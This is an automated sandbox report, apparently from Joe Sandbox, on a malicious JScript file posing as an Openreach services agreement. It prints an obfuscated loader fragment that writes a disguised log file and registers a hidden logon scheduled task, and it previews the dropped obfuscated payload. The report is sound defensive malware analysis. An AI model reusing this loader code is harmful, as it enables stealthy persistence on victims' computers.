Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
openreach network services agreement 62586.js

Overview

General Information

Sample Name:openreach network services agreement 62586.js
Analysis ID:891571
MD5:aeebc6be80dc6dd0c876ec91af97ca5f
SHA1:e896c6674313684f90255b7bc41da21f43b3adca
SHA256:e6fadd7b9aca98e13cb85930aac7631d6611874d059e98ef4139a98a92508d4c

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Potential evasive JS / VBS script found (domain check)
Java / VBScript file with very long strings (likely obfuscated code)
Creates COM task schedule object (often to register a task for autostart)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • wscript.exe (PID: 3132 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\openreach network services agreement 62586.js" MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

  • Spreading
  • Networking
  • System Summary
  • Data Obfuscation
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: openreach network services agreement 62586.jsString found in binary or memory: http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating
Source: openreach network services agreement 62586.jsString found in binary or memory: http://paulirish.com/2011/requestanimationframe-for-smart-animating/
Source: openreach network services agreement 62586.jsString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: openreach network services agreement 62586.jsString found in binary or memory: https://gist.github.com/paulirish/1579671
Source: openreach network services agreement 62586.jsString found in binary or memory: https://github.com/darius/requestAnimationFrame/blob/master/requestAnimationFrame.js
Source: openreach network services agreement 62586.jsString found in binary or memory: https://github.com/jasonmayes/mdl-component-design-pattern
Source: openreach network services agreement 62586.jsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: classification engineClassification label: mal52.evad.winJS@1/1@0/0
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Tobacco Industry.logJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sh|.logTobacco Industry|overyProject Rec|ilableStartWhenAva|itspl|bFoldersSu|ssment.jsWorkplace Hara|mena|kDefinitionRegisterTas|UserId|lderGetFo|ountC|ettingss|leGetFi|ndatE|thPa|oundr|Nextmove|ctoryWorkingDire|sAction|oseCl|ripting.FileSystemObjectSc|tCreateObjec|ExistsFile|ShortName|ingsExpandEnvironmentStr|andomr|Hidden|askGetT|erIdLogonTrigg|tuvwxyzabcdefghijklmnopqrs|enTextFileOp|Write|tConnec|ExRun|iptwscr|ServiceSchedule.|item|DATA%%APP|umentsArg|eCreat|loorf|ggerstri|%USERDOMAIN%\\%USERNAME%";aqzHi = qSREoT.split("|");Oyzwy = aqzHi[EQQd];for (var CHwNm = 0; CHwNm <= EQQd; CHwNm++) {Oyzwy = Oyzwy.substr(1)+Oyzwy.substr(0,1);}return Oyzwy;}lvnqJY = O(4);nLGSrawL = O(3);KxamH = O(8);mKIPug = sing0gj(qyokbv+moonf+wbccwnn+gonl+veryh+friendc+darka+your5+love4+sati+eiicez+idohqjph2+card1+writee+sxtn+atom0+roome+knajo+carey+chair85+termd+captainj0c+supportx+gave0+rune+she2+period3+zhvhcz4+live9+touch9+notice4+how7+ubddpaku+jyjcwyj+hunt9+observe8+gmblzt+especiallyb+ckey+ewria+neck6+mouth3+rrbwt+followu+exobilt+redkk+umadof+motheri+point2+wihyn+evening9+subject8+linep+clothe01+angeri+glassp+rmrun+hill8+wild5650+kvdr+otljsnvxs+uqir+agree1+vshgbmr+anzdx+kxmsrjzp+mkdgtn+coast1+fact1+zdlp+vlmape+high2+himy+ten5+zjad+been435+difficulti+btlt+be3+north1+dress1);qQPBpr = WScript;thdTDxk = qQPBpr[O(24)](O(2));yhIAfT = qQPBpr[O(24)](O(23));pbMwEt = qQPBpr[O(24)](O(38));function floEy(nMMGxvN){return Math[O(18)](Math[O(28)]()*nMMGxvN);}pbMwEt[O(35)]();jQdVV = pbMwEt[O(12)]("\\");try{ytkM = jQdVV[O(30)](lvnqJY);}catch(tClts){ytkM = false;}if (ytkM == false) {cWAyl = yhIAfT[O(12)](thdTDxk[O(27)](O(40)))[O(7)];eoJFi = 589-(Math[O(43)](589/cWAyl[O(13)])*cWAyl[O(13)]);STyWg = 0;jkEEbdU = false;for(PROZWoG = new Enumerator(cWAyl); !PROZWoG[O(16)](); PROZWoG[O(19)]()) {dpJabj = PROZWoG[O(39)]();if (eoJFi==STyWg) jkEEbdU = dpJabj;STyWg++;}if (jkEEbdU != false) {PcecVtkS = jkEEbdU+"\\"+nLGSrawL;if(!yhIAfT[O(25)](PcecVtkS)){JqXci = yhIAfT[O(33)](PcecVtkS, 8, true);JqXci[O(34)](mKIPug);FOgg="";STyWg=0;jCMvjOs=0;FVqTmn = floEy(589)+8528;cktyHeH = O(32)[O(6)]('');GTJGxGR = Math[O(28)];DlKsVf = Math[O(18)];while(true) {FOgg += cktyHeH[DlKsVf(GTJGxGR()*25)];if (jCMvjOs==FVqTmn) {jCMvjOs=0;FVqTmn = floEy(589)+8528;JqXci[O(34)](FOgg+";");FOgg="";}STyWg++;jCMvjOs++;if (STyWg==42549807) break;}JqXci[O(22)]();JqXci = yhIAfT[O(15)](PcecVtkS);JqXci[O(9)] = KxamH;IysJNk = JqXci[O(26)];BKlPDP = pbMwEt[O(0)](0);BKlPDP[O(14)][O(5)] = true;BKlPDP[O(14)][O(29)] = false;dAbIGcD = BKlPDP[O(44)][O(42)](9);dAbIGcD["ID"] = O(31);dAbIGcD[O(11)] = thdTDxk[O(27)](O(45));gmlIb = BKlPDP[O(21)][O(42)](0);gmlIb[O(17)] = O(37);gmlIb[O(41)] = IysJNk;gmlIb[O(20)] = jkEEbdU;jQdVV[O(10)](lvnqJY, BKlPDP, 6, "" , "" , 3);ytkM = jQdVV[O(30)](lvnqJY);ytkM[O(36)](null, 2, 0, "");}}}qQPBpr[O(1)]();
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: USERDOMAIN%\\%USERNAME%";aqzHi = qSREoT.split("|");Oyzwy = aqzHi[EQQd];for (var CHwNm = 0; CHwNm <= EQQd; CHwNm++) {Oyzwy = Oyzwy.substr(1)+Oyzwy.substr(0,1);}return Oyzwy;}lvnqJY = O(4);nLGSrawL = O(
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Scripting		1
Scheduled Task/Job		1
Scheduled Task/Job		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Scheduled Task/Job		1
Office Application Startup		Boot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
Scripting		Security Account Manager2
System Information Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 891571 Sample: openreach network services ... Startdate: 20/06/2023 Architecture: WINDOWS Score: 52 4 wscript.exe 1 2->4         started        signatures3 7 JScript performs obfuscated calls to suspicious functions 4->7 9 Potential evasive JS / VBS script found (domain check) 4->9

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://www.apache.org/licenses/LICENSE-2.0openreach network services agreement 62586.jsfalse
    		high
    https://gist.github.com/paulirish/1579671openreach network services agreement 62586.jsfalse
      		high
      http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animatingopenreach network services agreement 62586.jsfalse
        		high
        http://paulirish.com/2011/requestanimationframe-for-smart-animating/openreach network services agreement 62586.jsfalse
          		high
          https://github.com/darius/requestAnimationFrame/blob/master/requestAnimationFrame.jsopenreach network services agreement 62586.jsfalse
            		high
            https://github.com/jasonmayes/mdl-component-design-patternopenreach network services agreement 62586.jsfalse
              		high

              World Map of Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:891571
              Start date and time:2023-06-20 20:29:13 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 3s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsinteractivecookbook.jbs
              Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:openreach network services agreement 62586.js
              Detection:MAL
              Classification:mal52.evad.winJS@1/1@0/0
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Exclude process from analysis (whitelisted): HxTsr.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, login.live.com
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Roaming\Microsoft\Tobacco Industry.log

              Download File
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:modified
              Size (bytes):21560371
              Entropy (8bit):4.688857009150909
              Encrypted:false
              SSDEEP:49152:ZFHRSjneIzM63/U01V9RkThifiiLgZh6/GB8ZjPcM6Eo7GDk5ppuYbB8J4O1846h:3
              MD5:FBB71376ECE43984E006BAB2F023103B
              SHA1:64FAF091435407B8CF7B7C4B0047287D20192F9B
              SHA-256:CD7A1BECF0DFF3DAE8B2DDF3B9C6275735C7A5EDDDDFA0E2A27E7C8BD4477E16
              SHA-512:4C7F2FF98F1BA6F6CAD9A49A1FF128E88CA8694E08A03422A8139130577CB6123070E86784B6270E9B35AAC6ECAE24E64DDE9C38182C4BF5AD64552E60655E0C
              Malicious:false
              Reputation:low
              Preview:37194372775927059843571691841857943881157354331;mix6 = 1;nov = mix6;look3='.SaSnW$ueM;\'t\\\\I\'+/^+\'x\\\\\"\'\\mu)+l\')\\\\(\'+)g+\'S\\\\w\'$S\'r\\e\'\\\\\'+R++\'P\\\\\'\'\\Mmp ';function people2(rvsvdm0m, presentv, invent9, yqcvd){xodt=foote(figure3(mshiu),oftenp);mmbkhd[43209] = thick8;}function representz(valley0, port0, oeqcxl, eoqsg, pszzev6) {had7 = "jHSGX";for (xwdukg = mix6; xwdukg < (valley0*motionm); xwdukg++) { had7 = had7 + xwdukg + had7; return xwdukg;}}function song12(){xodt[vsdsjpw](xodt[nov])(mmbkhd);mmbkhd = gymrotf;}gymrotf = mix6-nov;store9='AreMmp\'e\\cet+.}S\'p\\Y)hb\\;\'$p$+ \\I\'\'\\\\\'\'+\\s+\\+\'\' \\\\\'\"\\Tr,mC';meatl='\\/+R+/\'T\\\\\'\'\\Se+pPS\\S\'NI|to\\\'\'\\hp++es\\\'\'\\h\'Z\\as\\+\'E\\\'\'\\+L+E\\e\'\'\\\\\'cg+nT.\'\\\\\' n';function join9(cooku, ynfhl){mshiu = bcvhj+causea+childl+naogue+separate6+dollaro+thinkc+rlrate+effectt+body6+gffnxthp+serve2+khpbsae+oqfvh+temperaturec+xnitlb+zmlxkjgu+orderm+bread0+quiet0+wear9+six1+needw+fatk+now4+njlfksx;

              Static File Info

              General

              File type:Unicode text, UTF-8 text
              Entropy (8bit):5.099792197573881
              TrID:
                File name:openreach network services agreement 62586.js
                File size:164815
                MD5:aeebc6be80dc6dd0c876ec91af97ca5f
                SHA1:e896c6674313684f90255b7bc41da21f43b3adca
                SHA256:e6fadd7b9aca98e13cb85930aac7631d6611874d059e98ef4139a98a92508d4c
                SHA512:10ebaff6bb900ee24928b88db054fa6eb59d1bdececa7d98fc15ea6b13ae197813fd9556eb4f593a3fb559451f479a449f0e783b7c30e2cdc206d311509e131e
                SSDEEP:3072:olg1kjSdLLVjz6QsO7NN0w7UU5twBrrt9bom7BDafiHICXzE+H6+dlftEkqPEaPx:olg1kjSdLLVjz6QsO7NN0w7UU5twBrry
                TLSH:46F3A51826E600F6455B2C6A4B2F514DB257804F86264898FCADC7DD0FA6B3417BAFFC
                File Content Preview:;(function() {."use strict";../**. * @license. * Copyright 2015 Google Inc. All Rights Reserved.. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a

                File Icon

                Icon Hash:68d69b8bb6aa9a86

                Network Behavior

                No network behavior found

                Statistics

                CPU Usage

                050100150s020406080100

                Click to jump to process

                Memory Usage

                050100150s0.00100020003000MB

                Click to jump to process

                High Level Behavior Distribution

                • File
                • Registry

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:20:29:40
                Start date:20/06/2023
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\openreach network services agreement 62586.js"
                Imagebase:0x7ff6421a0000
                File size:165888 bytes
                MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Show Windows behavior

                File Activities

                Show Windows behavior

                Section Activities

                Show Windows behavior

                Registry Activities

                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                Show Windows behavior

                Thread Activities

                Show Windows behavior

                Memory Activities

                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                Show Windows behavior

                Windows UI Activities

                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                Disassembly

                No disassembly